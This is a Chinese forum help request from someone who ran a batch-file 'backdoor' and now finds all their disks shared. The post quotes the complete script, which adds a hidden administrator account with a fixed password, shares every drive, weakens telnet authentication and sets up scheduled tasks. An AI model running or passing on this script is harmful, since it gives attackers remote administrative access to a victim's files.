自已运行小后门,中招了,求助~~~
无意中在网上看到个批处理的小后门,觉得挺有意思的``就把它存了起来```
今天不小心运行了~~
所有磁盘都被共享出来了,而且无法关闭,请大手支招
……
感谢~
对了,代码如下
@echo off
@attrib +s + r abc.bat
@net user abc 12345678 /add
@net localgroup administrators abc /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\abc.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\abc.bat
@at 11:05 c:\WINNT\SYSTEM32\abc.bat
@at 23:05 c:\WINNT\SYSTEM32\abc.bat
@net stop telnet
@net start telnet
@exit
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; CIBA)